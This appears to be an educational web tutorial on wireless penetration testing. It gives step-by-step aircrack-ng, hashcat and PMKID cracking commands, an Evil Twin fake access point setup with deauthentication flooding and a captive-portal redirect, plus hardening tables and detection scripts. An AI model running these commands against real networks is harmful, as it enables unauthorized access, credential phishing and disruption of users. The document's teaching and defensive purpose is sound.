Security

Wireless Penetration Testing

A complete guide to wireless penetration testing: reconnaissance, WiFi cracking, Evil Twin, rogue APs, through to wireless IDS

1. Introduction to Wireless Penetration Testing

Wireless penetration testing is the process of evaluating the security of a wireless network to identify vulnerabilities, misconfigurations, and potential avenues of exploitation. Unlike a wired network, a wireless network can be reached from a distance without any physical connection.

📋 What You Will Learn
  • Wireless security protocols (WEP, WPA, WPA2, WPA3)
  • WiFi reconnaissance and scanning
  • Password cracking techniques
  • Evil Twin and rogue AP attacks
  • Wireless IDS/IPS deployment
  • Remediation and hardening

Wireless Security Protocol Evolution

Protocol   Year   Encryption         Status
WEP        1999   RC4 (24-bit IV)    Broken; do not use
WPA        2003   TKIP/RC4           Deprecated
WPA2       2004   AES-CCMP           Current standard
WPA3       2018   SAE/AES-GCMP       Recommended
⚠️ Legal Notice

Wireless penetration testing may ONLY be performed on networks you own or have written permission to test. Accessing a network without authorization is an offence under Articles 30-32 of Indonesia's Electronic Information and Transactions Law (UU ITE).

2. Tools and Setup

A wireless pentest needs suitable hardware and software. The wireless adapter must support monitor mode and packet injection.

Hardware Requirements

Bash — Install Wireless Tools
# =============================================
# Installing wireless pentesting tools
# =============================================

# Update system
sudo apt update && sudo apt upgrade -y

# Install Aircrack-ng suite
sudo apt install -y aircrack-ng

# Install additional tools (hcxpcapngtool and hcxdumptool ship in the
# hcxtools and hcxdumptool packages)
sudo apt install -y \
  hostapd dnsmasq reaver wifite bully \
  pixiewps mdk3 mdk4 hashcat \
  hcxdumptool hcxtools \
  kismet wireshark

# Verify the wireless adapter is recognised
iwconfig

# Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Verify monitor mode
iwconfig wlan0mon

# Check adapter capabilities (monitor mode must be listed)
iw list | grep -A 8 "Supported interface modes"

3. Wireless Reconnaissance

Reconnaissance is the first step. Its goal is to identify every wireless network, client, and configuration within range.

Bash — WiFi Reconnaissance
# =============================================
# Wireless reconnaissance with Aircrack-ng
# =============================================

# 1. Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# 2. Scan all channels (passive)
sudo airodump-ng wlan0mon \
  --band abg \
  --write scan_results \
  --output-format pcap,csv

# 3. Focus on the target network
sudo airodump-ng wlan0mon \
  --bssid AA:BB:CC:DD:EE:FF \
  --channel 6 \
  --write target_capture \
  --output-format pcap,csv

# 4. Capture the handshake (with deauth)
sudo aireplay-ng --deauth 10 \
  -a AA:BB:CC:DD:EE:FF \
  -c 11:22:33:44:55:66 \
  wlan0mon

# 5. Verify the handshake was captured
aircrack-ng target_capture-01.cap

# =============================================
# Alternative: Kismet passive scanning
# =============================================

# Start Kismet server
sudo kismet -c wlan0mon --override wardrive

# Kismet detects:
# - SSIDs and BSSIDs
# - Channel and encryption
# - Client devices
# - Hidden SSIDs
# - Rogue access points

Client Enumeration

Bash — Client Discovery
# =============================================
# Client Enumeration & Analysis
# =============================================

# List all clients associated with AP
sudo airodump-ng wlan0mon \
  --bssid AA:BB:CC:DD:EE:FF \
  --channel 6 \
  --station-only

# Probe request analysis (what networks clients look for)
# This reveals SSIDs the client has previously joined
sudo tcpdump -i wlan0mon -e -s 256 \
  'type mgt subtype probe-req' 2>/dev/null

# Detect hidden SSIDs through probe responses
sudo tcpdump -i wlan0mon -e -s 256 \
  'type mgt subtype probe-resp' 2>/dev/null

4. WEP Cracking

WEP uses RC4 with a 24-bit IV, which is critically weak; the key can be recovered in minutes.

Bash — WEP Cracking
# =============================================
# WEP Cracking Steps
# =============================================

# Step 1: Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Step 2: Capture IVs
sudo airodump-ng wlan0mon \
  --bssid AA:BB:CC:DD:EE:FF \
  --channel 11 \
  --write wep_capture \
  --output-format pcap

# Step 3: Generate traffic (ARP replay)
sudo aireplay-ng --arpreplay \
  -b AA:BB:CC:DD:EE:FF \
  -h YOUR_MAC \
  wlan0mon

# Step 4: Fake authentication
sudo aireplay-ng --fakeauth 30 \
  -a AA:BB:CC:DD:EE:FF \
  -h YOUR_MAC \
  wlan0mon

# Step 5: Crack once ~20,000+ IVs have been collected
sudo aircrack-ng wep_capture-01.cap
# Output: KEY FOUND! [ 1A:2B:3C:4D:5E ]

# Alternative: fragmentation attack
sudo aireplay-ng --fragment \
  -b AA:BB:CC:DD:EE:FF \
  -h YOUR_MAC \
  wlan0mon
💡 Note

WEP cracking needs at least 20,000 IVs for a 64-bit key and 40,000 IVs for a 128-bit key. With ARP replay this is reached in 5-10 minutes. Every organization MUST migrate to WPA2/WPA3.

5. WPA/WPA2 Cracking

WPA2 uses AES-CCMP, which is cryptographically strong. WPA2-PSK, however, is vulnerable to dictionary attacks when the passphrase is weak.

Bash — WPA2 Cracking
# =============================================
# WPA2-PSK Cracking
# =============================================

# Step 1: Monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Step 2: Capture handshake
sudo airodump-ng wlan0mon \
  --bssid AA:BB:CC:DD:EE:FF \
  --channel 6 \
  --write wpa_handshake

# Step 3: Force reconnect (deauth)
sudo aireplay-ng --deauth 5 \
  -a AA:BB:CC:DD:EE:FF \
  wlan0mon

# Step 4: Verify handshake
aircrack-ng wpa_handshake-01.cap

# Step 5: Dictionary attack
aircrack-ng wpa_handshake-01.cap \
  -w /usr/share/wordlists/rockyou.txt \
  -b AA:BB:CC:DD:EE:FF

# =============================================
# Hashcat (GPU accelerated)
# =============================================

# Convert to hashcat format
hcxpcapngtool wpa_handshake-01.cap \
  -o wpa_hash.hc22000

# GPU brute force
hashcat -m 22000 wpa_hash.hc22000 \
  /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule

# Mask attack (8 char lowercase + digits)
hashcat -m 22000 wpa_hash.hc22000 \
  -a 3 ?l?l?l?l?l?l?d?d

# =============================================
# PMKID attack (no client or deauth needed)
# =============================================

sudo hcxdumptool -i wlan0mon \
  --filterlist_ap=target.txt \
  --filtermode=2 \
  -o pmkid_capture.pcapng

hcxpcapngtool pmkid_capture.pcapng \
  -o pmkid_hash.hc22000
hashcat -m 22000 pmkid_hash.hc22000 \
  /usr/share/wordlists/rockyou.txt

6. WPA3 Security

WPA3 introduces SAE (Simultaneous Authentication of Equals), which replaces PSK and provides protection against offline dictionary attacks as well as forward secrecy.

WPA3 Improvements

Bash — WPA3/SAE Testing
# =============================================
# WPA3 Dragonblood Attacks (Research)
# =============================================

# Note: for research and testing only

# Install wacker (SAE brute force)
git clone https://github.com/blunderbuss-wctf/wacker
cd wacker
pip3 install -r requirements.txt

# Run SAE brute force
sudo python3 wacker.py \
  --wordlist wordlist.txt \
  --ssid "TargetWiFi" \
  --bssid AA:BB:CC:DD:EE:FF \
  --interface wlan0mon

# Dragonblood vulnerabilities:
# CVE-2019-9494 — SAE cache-based side-channel
# CVE-2019-9495 — EAP-pwd side-channel
# CVE-2020-15862 — Transition Disable Attack

# Defense against downgrade:
# - Enable Protected Management Frames (802.11w)
# - Disable WPA2/TKIP transition mode
# - Monitor for deauth attacks
# - Use WPA3-only mode if possible

7. Evil Twin & Karma Attack

An Evil Twin is an attack in which the attacker sets up a fake AP that mimics the target's SSID. Once victims connect, the attacker can perform MITM, credential harvesting, and captive-portal phishing.

Bash — Evil Twin Attack
# =============================================
# Evil Twin Access Point Setup
# =============================================

# Step 1: hostapd configuration
cat > hostapd_evil.conf << 'EOF'
interface=wlan1
driver=nl80211
ssid=FreeWiFi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=0
EOF

# Step 2: DHCP configuration (dnsmasq)
cat > dnsmasq_evil.conf << 'EOF'
interface=wlan1
dhcp-range=192.168.100.10,192.168.100.50,12h
dhcp-option=3,192.168.100.1
dhcp-option=6,192.168.100.1
server=8.8.8.8
log-queries
log-dhcp
EOF

# Step 3: Setup IP and routing
sudo ifconfig wlan1 192.168.100.1 netmask 255.255.255.0
sudo sysctl -w net.ipv4.ip_forward=1   # 'sudo echo 1 > file' fails: the redirect runs unprivileged

# Step 4: Start services
sudo hostapd hostapd_evil.conf &
sudo dnsmasq -C dnsmasq_evil.conf &

# Step 5: Deauth clients from the real AP
sudo aireplay-ng --deauth 0 \
  -a AA:BB:CC:DD:EE:FF \
  wlan0mon

# Step 6: Captive portal redirect
sudo iptables -t nat -A PREROUTING \
  -i wlan1 -p tcp --dport 80 \
  -j DNAT --to-destination 192.168.100.1:80

8. Defense & Hardening

Common Findings & Remediation

Finding               Severity   Remediation
WEP encryption        Critical   Migrate to WPA3 or WPA2-AES
Weak WPA2 password    High       Complex password of 12+ characters
Rogue AP detected     High       Locate and remove it; deploy WIDS
Open network          Medium     Add WPA2-Enterprise with 802.1X
No PMF                Medium     Enable PMF (802.11w)
Hidden SSID           Low        Not effective; focus on strong encryption
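As an added example (not part of the original guide), the following Python script turns an airodump-ng CSV scan into findings with the severities of the table above. The CSV is a constructed sample in airodump-ng's layout, and the inventory of authorized BSSIDs per SSID is assumed for illustration; a BSSID advertising one of your SSIDs without being in that inventory is the rogue AP / Evil Twin indicator a WIDS would raise.

```python
import csv
import io

# Constructed sample in the airodump-ng CSV layout (not a real capture).
# The AP table ends at the first blank line; the station table follows it.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -45,  120,  0,   0.  0.  0.  0,   8, CorpWiFi,
AA:BB:CC:DD:EE:02, 2024-01-01 10:01:00, 2024-01-01 10:05:00,  6,  54, OPN,  ,  , -38,   60,  0,   0.  0.  0.  0,   8, CorpWiFi,
AA:BB:CC:DD:EE:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  11, WEP, WEP,  , -70,   90,  0,   0.  0.  0.  0,   6, Legacy,
AA:BB:CC:DD:EE:04, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WPA3, CCMP, SAE, -50,  100,  0,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-01-01 10:02:00, 2024-01-01 10:05:00, -60, 40, AA:BB:CC:DD:EE:02, CorpWiFi
"""

# Hypothetical inventory: the BSSIDs that legitimately serve each of our SSIDs
AUTHORIZED = {"CorpWiFi": {"AA:BB:CC:DD:EE:01"}, "Guest": {"AA:BB:CC:DD:EE:04"}}


def parse_access_points(csv_text):
    """Return the AP rows of an airodump-ng CSV as a list of dicts keyed by header."""
    ap_table = csv_text.split("\n\n")[0]
    rows = list(csv.reader(io.StringIO(ap_table), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    return [dict(zip(header, (c.strip() for c in row))) for row in rows[1:] if row]


def audit_access_points(aps, authorized):
    """Map each AP to (severity, bssid, finding) tuples per the remediation table."""
    findings = []
    for ap in aps:
        bssid, priv, essid = ap["BSSID"], ap["Privacy"], ap["ESSID"]
        if "WEP" in priv:
            findings.append(("Critical", bssid, "WEP encryption"))
        elif priv == "OPN":
            findings.append(("Medium", bssid, "Open network"))
        # Evil Twin indicator: one of our SSIDs is advertised by a BSSID we do not own
        if essid in authorized and bssid not in authorized[essid]:
            findings.append(("High", bssid, f"Rogue AP advertising '{essid}' ({priv})"))
    return findings


if __name__ == "__main__":
    for sev, bssid, what in audit_access_points(parse_access_points(SAMPLE_CSV), AUTHORIZED):
        print(f"{sev:8} {bssid}  {what}")
```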

Wireless Hardening Checklist

Config — WiFi Hardening
# =============================================
# Wireless Network Hardening Guide
# =============================================

# 1. Encryption
#    - Use WPA3-SAE or WPA2-AES (CCMP)
#    - Do not use WEP or WPA-TKIP
#    - Passwords of at least 12 characters, complex

# 2. Authentication
#    - Enterprise: WPA2/WPA3-Enterprise + RADIUS
#    - 802.1X certificate-based auth
#    - EAP-TLS for mutual authentication

# 3. Network Segmentation
#    - Guest network separated from the corporate network
#    - VLANs for wireless clients
#    - Firewall rules between VLANs

# 4. Management Frame Protection
#    - Enable 802.11w (PMF) - required
#    - Protect against deauth/disassoc attacks

# 5. Monitoring
#    - Deploy WIDS/WIPS
#    - Monitor rogue AP detection
#    - Alert on evil twin indicators
#    - Regular site surveys

# 6. Access Control
#    - MAC filtering (not the only control)
#    - RADIUS accounting
#    - Time-based access policies
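An added example, not from the original page: a small Python auditor that checks a hostapd configuration against the checklist above (cipher, PMF, SAE, passphrase length) and the WPA3 downgrade defenses in section 6. Both configuration fragments are constructed; the keys read are standard hostapd.conf options (wpa, wpa_key_mgmt, wpa_pairwise, rsn_pairwise, ieee80211w, wpa_passphrase, sae_password).

```python
# Constructed hostapd.conf fragments (not taken from any real deployment)
WEAK_CONF = """\
ssid=CorpWiFi
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
rsn_pairwise=TKIP CCMP
wpa_passphrase=corp1234
"""
HARDENED_CONF = """\
ssid=CorpWiFi
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
ieee80211w=2
sae_password=REPLACE-WITH-A-LONG-RANDOM-PASSPHRASE
"""

def parse_hostapd(text):
    """Parse key=value lines, skipping comments and blanks."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def audit_hostapd(conf):
    """Return (severity, finding) tuples following the hardening checklist."""
    findings = []
    wpa = int(conf.get("wpa", "0"))  # bit 0 = WPA (v1), bit 1 = WPA2/RSN
    key_mgmt = set(conf.get("wpa_key_mgmt", "").split())
    ciphers = set(conf.get("wpa_pairwise", "").split()) | set(conf.get("rsn_pairwise", "").split())
    if wpa == 0:
        return [("Critical", "Open network (wpa=0); enable WPA2/WPA3")]
    if wpa & 1:
        findings.append(("High", "WPA (v1) enabled; set wpa=2"))
    if "TKIP" in ciphers:
        findings.append(("High", "TKIP cipher allowed; use CCMP only"))
    if conf.get("ieee80211w", "0") != "2":
        findings.append(("Medium", "PMF not required; set ieee80211w=2"))
    if "SAE" not in key_mgmt:
        findings.append(("Medium", "No WPA3-SAE; add SAE to wpa_key_mgmt"))
    elif "WPA-PSK" in key_mgmt:
        findings.append(("Low", "WPA2/WPA3 transition mode; drop WPA-PSK once clients allow"))
    if len(conf.get("wpa_passphrase", "x" * 12)) < 12:
        findings.append(("High", "Passphrase shorter than 12 characters"))
    return findings
```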

WPA2 Handshake Analysis

Understanding the WPA2 4-way handshake is essential for wireless security testing. The handshake takes place when a client joins an access point, and the two sides exchange the cryptographic key material from which the session keys are derived.

Diagram: WPA2 4-Way Handshake
┌─────────────────────────────────────────────────────┐
│           WPA2 4-WAY HANDSHAKE                       │
│                                                      │
│  Client (Supplicant)        AP (Authenticator)       │
│       │                          │                   │
│       │    1. ANonce             │                   │
│       │ ◄────────────────────────│                   │
│       │                          │                   │
│       │  [Derive PTK from        │                   │
│       │   ANonce + SNonce +      │                   │
│       │   PMK + MAC addresses]   │                   │
│       │                          │                   │
│       │    2. SNonce + MIC       │                   │
│       │ ────────────────────────►│                   │
│       │                          │                   │
│       │  [AP derives PTK,        │                   │
│       │   verifies MIC]          │                   │
│       │                          │                   │
│       │    3. GTK + MIC          │                   │
│       │ ◄────────────────────────│                   │
│       │                          │                   │
│       │    4. ACK                │                   │
│       │ ────────────────────────►│                   │
│       │                          │                   │
│  [Both sides now have PTK        │                   │
│   for encrypted communication]   │                   │
└─────────────────────────────────────────────────────┘

WiFi Jamming and DoS

A denial-of-service attack on a wireless network can be carried out by sending deauthentication frames en masse, disconnecting every client from the access point.

Bash — WiFi DoS Detection
# =============================================
# WiFi DoS Attack Detection & Monitoring
# =============================================

# Monitor deauth flood attacks
sudo airodump-ng wlan0mon --output-format pcap \
  --write deauth_monitor

# mdk4 'd' mode generates a deauth flood (it is an attack tool, not a detector);
# use it in a lab to validate the detection below
sudo mdk4 wlan0mon d -c 6

# Monitor with Wireshark filter
# wlan.fc.type_subtype == 0x000c
# (Deauthentication frames)

# Counter-measures:
# 1. Enable 802.11w (Protected Management Frames)
# 2. Deploy WIDS to detect deauth floods
# 3. Use frequency hopping if supported
# 4. Monitor signal strength anomalies

# Script: deauth_monitor.sh (automated deauth flood detection)
#!/bin/bash
THRESHOLD=50            # deauth frames per window that trigger an alert
INTERFACE="wlan0mon"
WINDOW=10               # seconds per measurement window

while true; do
    # Count deauth frames seen during one window; 'timeout' ends the capture,
    # whereas 'tcpdump -c 1000' would block until 1000 deauth frames arrived
    DEAUTH_COUNT=$(timeout "$WINDOW" tcpdump -i "$INTERFACE" -l \
      'type mgt subtype deauth' 2>/dev/null | wc -l)
    if [ "$DEAUTH_COUNT" -gt "$THRESHOLD" ]; then
        echo "[ALERT] Deauth flood detected: $DEAUTH_COUNT frames in ${WINDOW}s"
        # Forward the alert to the SIEM via syslog
        logger -p auth.alert "WiFi deauth flood detected: $DEAUTH_COUNT frames in ${WINDOW}s"
    fi
done
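As an added example (not the page's script), the same deauth-flood detection in Python, run over constructed tcpdump-style lines: it counts deauthentication frames per BSSID in a sliding window and reports how many were sent to the broadcast address, which is the classic flood signature a WIDS alerts on. The line format and the burst are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style lines for 'type mgt subtype deauth' (not a real capture):
# one legitimate deauth at 10:00:01, then a burst of 60 broadcast deauths within 3 seconds.
LINE_FMT = ("10:00:{sec:02d}.{usec:06d} 2437 MHz 11g -41dBm signal BSSID:{bssid} "
            "DA:{da} SA:{bssid} DeAuthentication: Class 3 frame received from nonassociated station")

def constructed_lines():
    ap = "aa:bb:cc:dd:ee:01"
    lines = [LINE_FMT.format(sec=1, usec=100000, bssid=ap, da="11:22:33:44:55:66")]
    for i in range(60):
        lines.append(LINE_FMT.format(sec=5 + i // 20, usec=(i % 20) * 50000, bssid=ap, da="ff:ff:ff:ff:ff:ff"))
    return lines

DEAUTH_RE = re.compile(r"^(\d\d):(\d\d):(\d\d)\.(\d+).*?BSSID:([0-9a-f:]{17}) DA:([0-9a-f:]{17}).*DeAuthentication", re.I)

def parse_deauth(line):
    """Return (seconds_since_midnight, bssid, destination) or None for non-deauth lines."""
    m = DEAUTH_RE.match(line)
    if not m:
        return None
    h, mi, s, frac, bssid, da = m.groups()
    t = int(h) * 3600 + int(mi) * 60 + int(s) + int(frac) / 10 ** len(frac)
    return t, bssid.lower(), da.lower()

def detect_floods(lines, window=10.0, threshold=50):
    """Alert (bssid, peak_count, broadcast_count) when any sliding window exceeds the threshold."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_deauth(line)
        if parsed:
            events[parsed[1]].append((parsed[0], parsed[2]))
    alerts = []
    for bssid, evs in events.items():
        evs.sort()
        start, peak, peak_bcast = 0, 0, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if end - start + 1 > peak:
                peak = end - start + 1
                # broadcast deauths (DA ff:ff:ff:ff:ff:ff) disconnect every client at once
                peak_bcast = sum(1 for _, da in evs[start:end + 1] if da == "ff:ff:ff:ff:ff:ff")
        if peak > threshold:
            alerts.append((bssid, peak, peak_bcast))
    return alerts
```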

9. Comprehension Quiz

1. What does SAE stand for in WPA3?

2. Which tool is used to capture the WPA2 4-way handshake?

3. What is the minimum number of IVs needed to crack 64-bit WEP?

4. What is an Evil Twin attack?

5. Which wireless adapter mode is used for packet sniffing?

Summary

📝 Key Points
  • WEP: already broken; replace it with WPA2/WPA3 immediately
  • WPA2-PSK: vulnerable to dictionary attacks when the password is weak
  • WPA3: SAE prevents offline dictionary attacks
  • Evil Twin: a fake AP is highly dangerous; a WIDS is needed
  • Legal: always hold written permission before testing